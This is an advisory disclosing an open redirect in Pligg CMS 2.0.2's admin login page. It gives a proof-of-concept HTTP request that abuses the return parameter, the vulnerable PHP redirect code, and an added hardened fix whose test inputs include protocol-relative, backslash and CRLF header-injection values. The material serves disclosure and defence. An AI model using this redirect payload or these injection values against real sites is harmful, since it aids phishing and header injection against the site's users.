
Pligg CMS 2.0.2 Open Redirect

Posted on 19 August 2015

# Exploit Title: Pligg CMS admin_login.php Open Redirect Vulnerability
# Google Dork: N/A
# Date: 2015/8/18
# Exploit Author: Arash Khazaei
# Vendor Homepage: pligg.com
# Software Link: https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
# Version: 2.0.2 (Last Version)
# Tested on: Kali, Iceweasel Browser
# CVE : N/A
# Contact : http://twitter.com/0xClay
# Site : http://bhunter.ir

Introduction :

Pligg CMS is a CMS written in PHP and licensed under GPL v2.0.
An open redirect vulnerability exists in the admin_login.php file, through the return= input.

# POC :

POST /pligg-cms-master/admin/admin_login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pligg-cms-master/admin/admin_login.php?return=http://google.com
Cookie: panelState=CollapseModules; PHPSESSID=9nd8tubu0j825n9ifobfibot86
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

username=admin&password=admin&processlogin=1&return=http://google.com

=====================

Vulnerable Code :

if(strpos($_SERVER['SERVER_SOFTWARE'], "IIS") && strpos(php_sapi_name(), "cgi") >= 0){
    echo '<SCRIPT LANGUAGE="JavaScript">window.location="' . $return . '";</script>';
    echo $main_smarty->get_config_vars('PLIGG_Visual_IIS_Logged_In') . '<a href = "'.$return.'">' . $main_smarty->get_config_vars('PLIGG_Visual_IIS_Continue') . '</a>';
} else {
    header('Location: '.$return);
}
die;

Discovered By : Arash Khazaei
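
A hardened form of the redirect in the vulnerable code above, as an added example that is not part of the original advisory or of Pligg's code base. The function names safe_return_target() and redirect_after_login() and the '/' fallback are hypothetical, and the policy assumed is that a post-login redirect only ever needs to reach a path on the same host.

```php
<?php
// Added example, not Pligg's code. Function names and the '/' fallback are
// hypothetical; the policy assumed is "same-host paths only".

function safe_return_target($return, $default = '/')
{
    if (!is_string($return) || $return === '') {
        return $default;
    }
    // CR/LF and other control characters have no place in a Location value.
    if (preg_match('/[\x00-\x1F\x7F]/', $return)) {
        return $default;
    }
    // Browsers treat "\" like "/", so "/\host" behaves like "//host".
    if (strpos($return, '\\') !== false) {
        return $default;
    }
    // Accept only a path on this host: one leading "/", never "//host",
    // and therefore never an absolute URL such as "http://...".
    if ($return[0] !== '/' || substr($return, 0, 2) === '//') {
        return $default;
    }
    return $return;
}

// Replacement for the header('Location: '.$return) branch (defined, not called).
function redirect_after_login($return)
{
    header('Location: ' . safe_return_target($return));
    exit;
}

// Constructed inputs; the first is the value used in the PoC request.
$samples = array(
    'http://google.com',
    '//google.com',
    '/\\google.com',
    "/admin/\r\nX-Injected: 1",
    '/admin/example.php?page=2',
);
foreach ($samples as $s) {
    printf("%-34s => %s\n", json_encode($s), safe_return_target($s));
}
```

The IIS branch writes the same $return into a script block and an href, so it needs the validated value as well, encoded for the context it is written into.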

 
